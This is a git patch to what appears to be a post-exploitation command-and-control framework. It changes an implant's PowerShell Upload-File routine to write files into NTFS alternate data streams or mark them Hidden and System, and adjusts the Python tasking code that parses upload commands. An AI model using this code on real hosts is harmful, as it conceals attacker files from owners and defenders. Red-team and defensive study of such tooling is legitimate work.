From eee5a50bbcf6d108ca924db7f716b8d23e9703b2 Mon Sep 17 00:00:00 2001 From: m0rv4i Date: Tue, 12 Mar 2019 08:57:51 +0000 Subject: [PATCH] Tinker with ADS --- Modules/Stage2-Core.ps1 | 33 +++++++++++++-------------------- Tasks.py | 6 ++---- 2 files changed, 15 insertions(+), 24 deletions(-) diff --git a/Modules/Stage2-Core.ps1 b/Modules/Stage2-Core.ps1 index de59159..894c42a 100644 --- a/Modules/Stage2-Core.ps1 +++ b/Modules/Stage2-Core.ps1 @@ -501,38 +501,31 @@ function Upload-File ) try { $Stream = "" - + $FullPath = $Destination + if ($Destination -Match ':[^\\]'){ + $Destination = $FullPath.Substring(0, $FullPath.LastIndexOf(":")) + $Stream = $FullPath.Substring($FullPath.LastIndexOf(":") + 1) + } + if($Stream){ + $NotHidden = $true + } if ($NotHidden -eq $true) { - write-output "Uploaded file to: $Destination" - $FullPath = $Destination - if ($Destination -Match ':[^\\]'){ - $Destination = $FullPath.Substring(0, $FullPath.LastIndexOf(":")) - $Stream = $FullPath.Substring($FullPath.LastIndexOf(":") + 1) - } $fileBytes = [Convert]::FromBase64String($Base64) if ($Stream){ - add-content -path $Destination -value $fileBytes -stream $Stream -encoding byte + set-content -path $Destination -value $fileBytes -stream $Stream -encoding byte } else { [io.file]::WriteAllBytes($Destination, $fileBytes) } + write-output "Uploaded file to: $FullPath" } else { - write-output "Uploaded file as HIDDEN & SYSTEM to: $Destination" - write-output "Run Get-ChildItem -Force to view the uploaded files" - $FullPath = $Destination - if ($Destination -Match ':[^\\]'){ - $Destination = $FullPath.Substring(0, $FullPath.LastIndexOf(":")) - $Stream = $FullPath.Substring($FullPath.LastIndexOf(":") + 1) - } $fileBytes = [Convert]::FromBase64String($Base64) - if ($Stream){ - add-content -path $Destination -value $fileBytes -stream $Stream -encoding byte - } else { - [io.file]::WriteAllBytes($Destination, $fileBytes) - } + [io.file]::WriteAllBytes($Destination, $fileBytes) + write-output "Uploaded file as HIDDEN & SYSTEM to: $FullPath" $file = Get-Item $Destination -Force $attrib = $file.Attributes $attrib = "Hidden,System" $file.Attributes = $attrib + write-output "Run Get-ChildItem -Force to view the uploaded files" } } catch { diff --git a/Tasks.py b/Tasks.py index 90a1ff9..e263b40 100644 --- a/Tasks.py +++ b/Tasks.py @@ -2,7 +2,7 @@ from Colours import Colours from Core import load_module, load_module_sharp, encrypt, default_response -import DB, datetime, hashlib +import DB, datetime, hashlib, re def newTask(path): result = DB.get_implants_all() @@ -27,9 +27,7 @@ def newTask(path): user_command = command[0:150]+"......TRUNCATED......"+command[-80:] elif (command.lower().startswith('upload-file')): filepath = command.replace('upload-file', '') - if ":" in filepath: - filepath = filepath.split(":")[0].strip() - elif ";" in filepath: + if ";" in filepath: filepath = filepath.split(";")[1].strip() elif "estination" in filepath: filepath = filepath.split('"')[1].strip()